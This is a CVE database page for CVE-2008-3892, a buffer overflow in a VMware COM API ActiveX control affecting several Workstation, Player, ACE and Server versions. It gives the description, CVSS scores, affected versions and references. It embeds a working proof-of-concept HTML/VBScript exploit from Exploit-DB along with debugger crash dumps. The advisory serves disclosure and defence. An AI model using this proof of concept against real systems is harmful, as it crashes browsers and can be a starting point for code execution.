CVE-2008-3892 : Detail

CVE-2008-3892

Overflow
74.07%V3
Network
2008-09-03
12h00 +00:00
2018-10-11
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in a certain ActiveX control in the COM API in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 allows remote attackers to cause a denial of service (browser crash) or possibly execute arbitrary code via a call to the GuestInfo method in which there is a long string argument, and an assignment of a long string value to the result of this call. NOTE: this may overlap CVE-2008-3691, CVE-2008-3692, CVE-2008-3693, CVE-2008-3694, CVE-2008-3695, or CVE-2008-3696.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 6345

Publication date : 2008-08-31 22h00 +00:00
Author : shinnai
EDB Verified : Yes

----------------------------------------------------------------------------- VMWare COM API Buffer Overflow url: http://www.vmware.com/ Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.net This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7 ----------------------------------------------------------------------------- <object classid='clsid:38DB77F9-058D-4955-98AA-4A9F3B6A5B06' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe buff_1 = String (2000, "a") buff_2 = String (2000, "b") test.GuestInfo (buff_1) = buff_2 End Sub </script> Dump: 09:25:39.339 pid=0640 tid=0504 EXCEPTION (first-chance) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [00000070]) ---------------------------------------------------------------- EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EDX=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 ESP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 EBP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 ESI=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90 --> MOV EDX,[ECX+70] ---------------------------------------------------------------- 09:25:39.339 pid=0640 tid=0504 EXCEPTION (unhandled) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [00000070]) ---------------------------------------------------------------- EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EDX=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 ESP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 EBP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 ESI=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90 --> MOV EDX,[ECX+70] ---------------------------------------------------------------- # milw0rm.com [2008-09-01]

Products Mentioned

Configuraton 0

Vmware>>Ace >> Version From (including) 1.0 To (excluding) 1.0.7

Vmware>>Ace >> Version From (including) 2.0 To (excluding) 2.0.5

Vmware>>Player >> Version From (including) 1.0.0 To (excluding) 1.0.8

Vmware>>Player >> Version From (including) 2.0 To (excluding) 2.0.5

Vmware>>Server >> Version To (excluding) 1.0.7

Vmware>>Workstation >> Version From (including) 5.5 To (excluding) 5.5.8

Vmware>>Workstation >> Version From (including) 6.0 To (excluding) 6.0.5

References

https://www.exploit-db.com/exploits/6345
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/31709
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31710
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/30934
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/31707
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31708
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/29503
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/4202
Tags : third-party-advisory, x_refsource_SREASON
http://www.vupen.com/english/advisories/2008/2466
Tags : vdb-entry, x_refsource_VUPEN